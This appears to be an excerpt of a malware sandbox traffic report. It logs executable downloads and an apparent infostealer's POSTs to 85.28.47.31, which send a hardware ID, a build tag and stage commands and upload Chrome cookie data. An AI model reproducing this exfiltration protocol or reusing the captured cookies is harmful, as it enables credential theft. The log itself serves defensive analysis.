00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 26 Jul 2024 15:57:07 GMTContent-Type: application/octet-streamContent-Length: 311296Last-Modified: Fri, 26 Jul 2024 15:36:02 GMTConnection: keep-aliveETag: "66a3c262-4c000"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 47 1c a2 f4 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 ec 02 00 00 d0 01 00 00 00 00 00 a2 b9 02 00 00 20 00 00 00 20 03 00 00 00 40 00 00 20 00 00 00 04 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 05 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 50 b9 02 00 4f 00 00 00 00 20 03 00 c4 c9 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 05 00 0c 00 00 00 34 b9 02 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 88 e9 02 00 00 20 00 00 00 ec 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 c4 c9 01 00 00 20 03 00 00 cc 01 00 00 f0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 00 05 00 00 04 00 00 00 bc 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 26 Jul 2024 15:57:08 GMTContent-Type: application/octet-streamContent-Length: 91648Last-Modified: Fri, 26 Jul 2024 15:01:21 GMTConnection: keep-aliveETag: "66a3ba41-16600"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 62 05 40 5d 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 02 32 00 0c 01 00 00 56 00 00 00 00 00 00 00 10 00 00 00 10 00 00 00 30 01 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 a0 01 00 00 04 00 00 00 00 00 00 02 00 00 00 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 7c 71 01 00 c8 00 00 00 00 90 01 00 9c 0f 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 70 74 01 00 2c 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 63 6f 64 65 00 00 00 f0 37 00 00 00 10 00 00 00 38 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 74 65 78 74 00 00 00 c2 d2 00 00 00 50 00 00 00 d4 00 00 00 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 9d 33 00 00 00 30 01 00 00 34 00 00 00 10 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 2c 17 00 00 00 70 01 00 00 12 00 00 00 44 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 9c 0f 00 00 00 90 01 00 00 10 00 00 00 56 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.18.0 (Ubuntu)Date: Fri, 26 Jul 2024 15:57:10 GMTContent-Type: application/octet-streamContent-Length: 2755072Last-Modified: Fri, 26 Jul 2024 15:52:43 GMTConnection: keep-aliveETag: "66a3c64b-2a0a00"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 64 86 0b 00 a1 9c a3 66 00 00 00 00 00 00 00 00 f0 00 2e 02 0b 02 00 00 00 b0 27 00 00 06 2a 00 00 60 06 00 9a 10 00 00 00 10 00 00 00 00 00 40 01 00 00 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 05 00 02 00 00 00 00 00 00 d0 30 00 00 04 00 00 a3 71 2a 00 02 00 60 01 00 00 20 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 80 30 00 0c 05 00 00 00 b0 30 00 38 01 00 00 00 80 29 00 8c 4c 00 00 00 00 00 00 00 00 00 00 00 c0 30 00 9c 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 6e 29 00 28 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 81 30 00 18 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 a8 ae 27 00 00 10 00 00 00 b0 27 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 00 60 2e 64 61 74 61 00 00 00 60 ee 00 00 00 c0 27 00 00 f0 00 00 00 b4 27 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 64 61 74 61 00 00 f8 c3 00 00 00 b0 28 00 00 c4 00 00 00 a4 28 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 70 64 61 74 61 00 00 8c 4c 00 00 00 80 29 00 00 4e 00 00 00 68 29 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 78 64 61 74 61 00 00 30 42 00 00 00 d0 29 00 00 44 00 00 00 b6 29 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 62 73 73 00 00 00 00 90 5e 06 00 00 20 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 69 64 61 74 61 00 00 0c 05 00 00 00 80 30 00 00 06 00 00 00 fa 29 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 43 52 54 00 00 00 00 58 00 00 00 00 90 30 00 00 02 00 00 00 00 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 6c 73 00 00 00 00 10 00 00 00 00 a0 30 00 00 02 00 00 00 02 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 38 01 00 00 00 b0 30 00 00 02 00 00 00 04 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 9c 03 00 00 00 c0 30 00 00 04 00 00 00 06 2a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 85.28.47.31Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GIECFIEGDBKJKFIDHIECHost: 85.28.47.31Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 49 45 43 46 49 45 47 44 42 4b 4a 4b 46 49 44 48 49 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 41 31 42 42 30 41 46 41 33 31 36 44 33 33 39 32 32 35 39 37 34 39 0d 0a 2d 2d 2d 2d 2d 2d 47 49 45 43 46 49 45 47 44 42 4b 4a 4b 46 49 44 48 49 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 73 69 6c 61 0d 0a 2d 2d 2d 2d 2d 2d 47 49 45 43 46 49 45 47 44 42 4b 4a 4b 46 49 44 48 49 45 43 2d 2d 0d 0a Data Ascii: ------GIECFIEGDBKJKFIDHIECContent-Disposition: form-data; name="hwid"A1BB0AFA316D3392259749------GIECFIEGDBKJKFIDHIECContent-Disposition: form-data; name="build"sila------GIECFIEGDBKJKFIDHIEC--
Source: global traffic	HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----DAFIEHIEGDHIDGDGHDHJHost: 85.28.47.31Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 44 41 46 49 45 48 49 45 47 44 48 49 44 47 44 47 48 44 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 62 66 32 66 36 35 64 32 39 30 39 37 63 66 33 63 31 36 37 36 63 35 39 32 32 62 30 33 32 65 61 38 39 30 61 66 37 65 32 64 35 36 38 30 30 32 66 37 32 64 31 65 33 31 64 38 33 65 31 35 37 64 31 39 63 63 65 66 31 33 30 0d 0a 2d 2d 2d 2d 2d 2d 44 41 46 49 45 48 49 45 47 44 48 49 44 47 44 47 48 44 48 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 62 72 6f 77 73 65 72 73 0d 0a 2d 2d 2d 2d 2d 2d 44 41 46 49 45 48 49 45 47 44 48 49 44 47 44 47 48 44 48 4a 2d 2d 0d 0a Data Ascii: ------DAFIEHIEGDHIDGDGHDHJContent-Disposition: form-data; name="token"bbf2f65d29097cf3c1676c5922b032ea890af7e2d568002f72d1e31d83e157d19ccef130------DAFIEHIEGDHIDGDGHDHJContent-Disposition: form-data; name="message"browsers------DAFIEHIEGDHIDGDGHDHJ--
Source: global traffic	HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----JKEHIIJJECFHJKECFHDGHost: 85.28.47.31Content-Length: 267Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4a 4b 45 48 49 49 4a 4a 45 43 46 48 4a 4b 45 43 46 48 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 62 66 32 66 36 35 64 32 39 30 39 37 63 66 33 63 31 36 37 36 63 35 39 32 32 62 30 33 32 65 61 38 39 30 61 66 37 65 32 64 35 36 38 30 30 32 66 37 32 64 31 65 33 31 64 38 33 65 31 35 37 64 31 39 63 63 65 66 31 33 30 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 45 48 49 49 4a 4a 45 43 46 48 4a 4b 45 43 46 48 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 45 48 49 49 4a 4a 45 43 46 48 4a 4b 45 43 46 48 44 47 2d 2d 0d 0a Data Ascii: ------JKEHIIJJECFHJKECFHDGContent-Disposition: form-data; name="token"bbf2f65d29097cf3c1676c5922b032ea890af7e2d568002f72d1e31d83e157d19ccef130------JKEHIIJJECFHJKECFHDGContent-Disposition: form-data; name="message"plugins------JKEHIIJJECFHJKECFHDG--
Source: global traffic	HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IIEHJKJJJECFHJJJKKECHost: 85.28.47.31Content-Length: 268Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 49 49 45 48 4a 4b 4a 4a 4a 45 43 46 48 4a 4a 4a 4b 4b 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 62 66 32 66 36 35 64 32 39 30 39 37 63 66 33 63 31 36 37 36 63 35 39 32 32 62 30 33 32 65 61 38 39 30 61 66 37 65 32 64 35 36 38 30 30 32 66 37 32 64 31 65 33 31 64 38 33 65 31 35 37 64 31 39 63 63 65 66 31 33 30 0d 0a 2d 2d 2d 2d 2d 2d 49 49 45 48 4a 4b 4a 4a 4a 45 43 46 48 4a 4a 4a 4b 4b 45 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 49 49 45 48 4a 4b 4a 4a 4a 45 43 46 48 4a 4a 4a 4b 4b 45 43 2d 2d 0d 0a Data Ascii: ------IIEHJKJJJECFHJJJKKECContent-Disposition: form-data; name="token"bbf2f65d29097cf3c1676c5922b032ea890af7e2d568002f72d1e31d83e157d19ccef130------IIEHJKJJJECFHJJJKKECContent-Disposition: form-data; name="message"fplugins------IIEHJKJJJECFHJJJKKEC--
Source: global traffic	HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----IEHCAKKJDBKKFHJJDHIIHost: 85.28.47.31Content-Length: 6975Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /8405906461a5200c/sqlite3.dll HTTP/1.1Host: 85.28.47.31Cache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----KJKJJEGIDBGIDGCBAFHCHost: 85.28.47.31Content-Length: 751Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 4b 4a 4b 4a 4a 45 47 49 44 42 47 49 44 47 43 42 41 46 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 62 66 32 66 36 35 64 32 39 30 39 37 63 66 33 63 31 36 37 36 63 35 39 32 32 62 30 33 32 65 61 38 39 30 61 66 37 65 32 64 35 36 38 30 30 32 66 37 32 64 31 65 33 31 64 38 33 65 31 35 37 64 31 39 63 63 65 66 31 33 30 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 4b 4a 4a 45 47 49 44 42 47 49 44 47 43 42 41 46 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 59 32 39 76 61 32 6c 6c 63 31 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 30 52 6c 5a 6d 46 31 62 48 51 75 64 48 68 30 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 4b 4a 4a 45 47 49 44 42 47 49 44 47 43 42 41 46 48 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 4c 6d 64 76 62 32 64 73 5a 53 35 6a 62 32 30 4a 56 46 4a 56 52 51 6b 76 43 55 5a 42 54 46 4e 46 43 54 45 32 4f 54 6b 77 4d 54 45 32 4d 54 55 4a 4d 56 42 66 53 6b 46 53 43 54 49 77 4d 6a 4d 74 4d 54 41 74 4d 44 51 74 4d 54 4d 4b 4c 6d 64 76 62 32 64 73 5a 53 35 6a 62 32 30 4a 52 6b 46 4d 55 30 55 4a 4c 77 6c 47 51 55 78 54 52 51 6b 78 4e 7a 45 79 4d 6a 4d 77 4f 44 45 31 43 55 35 4a 52 41 6b 31 4d 54 45 39 52 57 59 31 64 6c 42 47 52 33 63 74 54 56 70 5a 62 7a 56 6f 64 32 55 74 4d 46 52 6f 51 56 5a 7a 62 47 4a 34 59 6d 31 32 5a 46 5a 61 64 32 4e 49 62 6e 46 57 65 6c 64 49 51 56 55 78 4e 48 59 31 4d 30 31 4f 4d 56 5a 32 64 33 5a 52 63 54 68 69 59 56 6c 6d 5a 7a 49 74 53 55 46 30 63 56 70 43 56 6a 56 4f 54 30 77 31 63 6e 5a 71 4d 6b 35 58 53 58 46 79 65 6a 4d 33 4e 31 56 6f 54 47 52 49 64 45 39 6e 52 53 31 30 53 6d 46 43 62 46 56 43 57 55 70 46 61 48 56 48 63 31 46 6b 63 57 35 70 4d 32 39 55 53 6d 63 77 59 6e 4a 78 64 6a 46 6b 61 6d 52 70 54 45 70 35 64 6c 52 54 56 57 68 6b 53 79 31 6a 4e 55 70 58 59 57 52 44 55 33 4e 56 54 46 42 4d 65 6d 68 54 65 43 31 47 4c 54 5a 33 54 32 63 30 43 67 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 4b 4a 4a 45 47 49 44 42 47 49 44 47 43 42 41 46 48 43 2d 2d 0d 0a Data Ascii: ------KJKJJEGIDBGIDGCBAFHCContent-Disposition: form-data; name="token"bbf2f65d29097cf3c1676c5922b032ea890af7e2d568002f72d1e31d83e157d19ccef130------KJKJJEGIDBGIDGCBAFHCContent-Disposition: form-data; name="file_name"Y29va2llc1xHb29nbGUgQ2hyb21lX0RlZmF1bHQudHh0------KJKJJEGIDBGIDGCBAFHCContent-Disposition: form-data; name="file"Lmdvb2dsZS5jb20JVFJVRQkvCUZBTFNFCTE2OTkwMTE2MTUJMVBfSkFSCTIwMjMtMTAtMDQtMTMKLmdvb2dsZS5jb20JRkFMU0UJLwlGQUxTRQkxNzEyMjMwODE1CU5JRAk1MTE9RWY1dlBGR3ctTVpZbzVod2UtMFRoQVZzbGJ4Ym12
Source: global traffic	HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EGCBFIEHIEGCAAAKKKKEHost: 85.28.47.31Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 47 43 42 46 49 45 48 49 45 47 43 41 41 41 4b 4b 4b 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 62 66 32 66 36 35 64 32 39 30 39 37 63 66 33 63 31 36 37 36 63 35 39 32 32 62 30 33 32 65 61 38 39 30 61 66 37 65 32 64 35 36 38 30 30 32 66 37 32 64 31 65 33 31 64 38 33 65 31 35 37 64 31 39 63 63 65 66 31 33 30 0d 0a 2d 2d 2d 2d 2d 2d 45 47 43 42 46 49 45 48 49 45 47 43 41 41 41 4b 4b 4b 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 45 47 43 42 46 49 45 48 49 45 47 43 41 41 41 4b 4b 4b 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 45 47 43 42 46 49 45 48 49 45 47 43 41 41 41 4b 4b 4b 4b 45 2d 2d 0d 0a Data Ascii: ------EGCBFIEHIEGCAAAKKKKEContent-Disposition: form-data; name="token"bbf2f65d29097cf3c1676c5922b032ea890af7e2d568002f72d1e31d83e157d19ccef130------EGCBFIEHIEGCAAAKKKKEContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------EGCBFIEHIEGCAAAKKKKEContent-Disposition: form-data; name="file"------EGCBFIEHIEGCAAAKKKKE--
Source: global traffic	HTTP traffic detected: POST /5499d72b3a3e55be.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EGCBFIEHIEGCAAAKKKKEHost: 85.28.47.31Content-Length: 363Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 47 43 42 46 49 45 48 49 45 47 43 41 41 41 4b 4b 4b 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 62 62 66 32 66 36 35 64 32 39 30 39 37 63 66 33 63 31 36 37 36 63 35 39 32 32 62 30 33 32 65 61 38 39 30 61 66 37 65 32 64 35 36 38 30 30 32 66 37 32 64 31 65 33 31 64 38 33 65 31 35 37 64 31 39 63 63 65 66 31 33 30 0d 0a 2d 2d 2d 2d 2d 2d 45 47 43 42 46 49 45 48 49 45 47 43 41 41 41 4b 4b 4b 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 45 47 43 42 46 49 45 48 49 45 47 43 41 41 41 4b 4b 4b 4b 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 45 47 43 42 46 49 45 48 49 45 47 43 41 41 41 4b 4b 4b 4b 45 2d 2d 0d 0a Data Ascii: ------EGCBFIEHIEGCAAAKKKKEContent-Disposition: form-data; name="token"bbf2f65d29097cf3c1676c5922b032ea890af7e2d568002f72d1e31d83e157d19ccef130------EGCBFIEHIEGCAAAKKKKEContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------EGCBFIEHIEGCAAAKKKKEContent-Disposition: form-data; name="file"------EGCBFIEHIEGCAAAKKKKE--
